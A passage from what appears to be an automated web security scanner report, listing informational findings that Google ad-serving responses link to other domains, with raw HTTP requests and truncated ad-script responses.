</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=Ip0ebvHq9-6cmCR2bXP5_fNx2AR3sIhp4p39Iz_V0Qg2ZWiQd3tT9BFQw06IP9QqBnjrxaFOX3A2Mp5hsqmn769niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloDYQQhNu9aqv6NqLy9PboSDUcW3gy4ahk2mxvXjqV_8HMdltWoLJ0ZRSlLXDIZEn8XYkMwDMhThyDTSkJz17--sccgy0lyoFcbjisrOYNESdVweqa0CK0OT2RuObPoCPAYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7lBPY5bJrxpuGqREB7_HXzaHnXpMPSYaXk1bDrduuz7117nSKtRoDtj2nylqWO-cGwaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3gTaS1w5xhX3951duqXeD-FccmVnaGRMAMpWrCzFs9XNyZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOagRBN5xins51mVi5acEHrzqo408BxR9uazB8jKSDnLvk&acp=TbRAZwAJT0AK5X5HHeFjM7WcAPevK6xDUElKMQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBNp-zZ0C0TcCeJcf8lQezxoXvAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtxE7bubHFUSlRmGJouJjp8ZmJ6qhA%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.386. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681164&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663164287&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303663164289&frm=1&adk=2614322350&ga_vid=1624490305.1303663164&ga_sid=1303663164&ga_hid=1243991265&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=5 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:39:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BWeb%2BServer%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.pickracks.com%26adT%3DSimplastics%25C2%25AE%2BPick%2BRacks%26adU%3Dtripplite.com/RackSolutions%26adT%3DOpen%2BFrame%2BRacks%26gl%3DUS&amp;usg=AFQjCNE-e__hIY4n_3Jps9PWh58vv2BZWg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.387. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303682122&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303664122092&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303664122108&frm=1&adk=2614322350&ga_vid=54280784.1303664122&ga_sid=1303664122&ga_hid=1733340252&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=235 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:55:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15255

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.doubletake.visionsolutions.com%26adT%3DVirtualization%2BWhitepaper%26adU%3DInfocus.com/MSPRevenue%26adT%3DIncrease%2BMSP%2BRevenue%26adU%3DPeru.travel%26adT%3DHotels%2B%2526amp%253B%2BResorts%2Bat%2BPeru%26adU%3DDealfind.com/Chicago%26adT%3DChicago%2BDaily%2BCoupons%26gl%3DUS&amp;usg=AFQjCNFXUAptrEV_7Z1GyExdDhfWvBHaMA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.388. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303679537&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html&dt=1303661711011&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661711022&frm=0&adk=1607234649&ga_vid=998623189.1303661711&ga_sid=1303661711&ga_hid=583594541&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&eid=33895132&fu=0&ifi=1&dtd=20&xpc=InkxqbMxa5&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:15:08 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DFree%2BOnline%2BNetwork%2BScan%26adU%3Dwww.Dell.com/Blades%26adT%3DPoweredge%2BServer%26adU%3Dwww.Cadillac.com/Escalade%26adT%3DMB%2BGL450%2Bvs%2BEscalade%26gl%3DUS&amp;usg=AFQjCNF3j70sttvFk20xsjl7RJ06Va9cBQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.389. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680013&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662012988&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662013000&frm=1&adk=2614322350&ga_vid=596070482.1303662013&ga_sid=1303662013&ga_hid=561352512&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:20:10 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25673337&ahcid=840118&bimpd=_5slL4D9RadDzW8NPRhCpPLQK_k1lqZ3jhRE1s0T9UJvDwQ3gKAhbrJGz0Ybjgrm6Pu_JaLRIdHrSMEVdVucX69niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BNTVfDaMWtGLJmN9PvDZhOlBYthQ5aCQ1mYSBEHRt8oSk9ydg04sOwARxmm8wMcfLZg0pkLSmXb9kMT6fUvaQOnTnt-vTTl1ccgclwVJEKA436waAnwiGEagegQWICZbOtsyyRQeXkTM-mPAHCYWjQchCho2vQFkPDNWqOr73J9btC8cnfVoc-ffY0bjr9ypPp0l40_4cIK_dVeFuq6yQtUFEGLiLwCfrF_l8MZMrUPZytEMFcbyi8Mz8uQjTAyhkgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7Iyw6uq0xJRP_FbHyt9ZNiNFVcTUxG7t3A6NzatYRd4Lm-a333a7UvwhV1lDapSbKjX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfoF1UrtUpipRKKz6A-3aAu-ni-SYlmeUF3Nm1iaLhF9kwA_xOrfycUFDp6u0zpJ64rt_T370WDWWY1SqEwEJwbh67avgm6Atn0OkHl8s2_rLjYvoIhw6vwnl4MOBUT5NT5A9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRNugABKe8K5X6IMLFNi31O5jN0gkiWmEgBvQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBe9piuk20Te_TBIj9lQeLm8WFA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAa34s3eoNuIjaAB%26num%3D1%26sig%3DAGiWqty87c8rwV_L7cUn5LDPmmQj3g85-Q%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.390. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516518&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516523&frm=1&adk=513358139&ga_vid=1030430259.1303658517&ga_sid=1303658517&ga_hid=340899808&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1364

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="728" height="90" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&"> </iframe>
...[SNIP]...

23.391. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680578&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662578710&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662578715&frm=1&adk=2614322350&ga_vid=1466159819.1303662579&ga_sid=1303662579&ga_hid=97024423&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:29:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1832

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=rgyqDU5E6D-uDKoNTkToPwAAAEAzMwdArgyqDU5E6D-uDKoNTkToP99ronZfgYdlSsYda6b2ziXvT7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAPQ8BAgUCAAQAAAAAJiC3RwAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303662623%29%3Buf%28%27c%27%2C+52368%2C+1303662623%29%3Buf%28%27r%27%2C+173254%2C+1303662623%29%3Bppv%288991%2C+%277315958366698892255%27%2C+1303662623%2C+1303705823%2C+52368%2C+25553%29%3B&cnd=!Qg9ejQiQmQMQxskKGAAg0ccBKEsxERukQU1E6D9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbRP7wAL7igK7F2ivbBeNvE-gfa8MEy-VgMXDg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAWAt70-0TajcL6K7sQe2vMHtC9fq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyvwLF7MoEVJ26YNwSnGTXHBTcukg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.392. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676620&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658620545&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658620550&frm=1&adk=2614322350&ga_vid=1094438829.1303658621&ga_sid=1303658621&ga_hid=825275319&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=36813005&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:37 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=jpgdhg9u3sNhsHaJRlQfD7s3M4ppch86fwqbNsEQoK0hE9MNJhGa6rfuLTDXwqgLUAQw1ppc7q_cXI65lvmh1q9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloqXHg5ybSqorAUuT7WodTias5odc_fN8lrM1sP_YEU8L8QXAnSoShrDHVAIaX5P2UXYkMwDMhThyDTSkJz17--1yYfUx0aSWjU5rLek88zmFr8VI-VhbAS9dWBM1kZBJwYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7rjO3SD4VdqcfcG-eEfpQLUQtPUcUlC_s56T2e_ZUTBr39Jzt9X3KZSy9qlP-Cz3tgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3j6d2S4vVdi3hczlBeeHjQhxM9Cpxmh6ci9ZEp0Ip-5iiZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRAeQAItqsK5WhEMkk4Fa_OmlA2N1Iqvj8Efw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBD-aSeUC0TavtIsT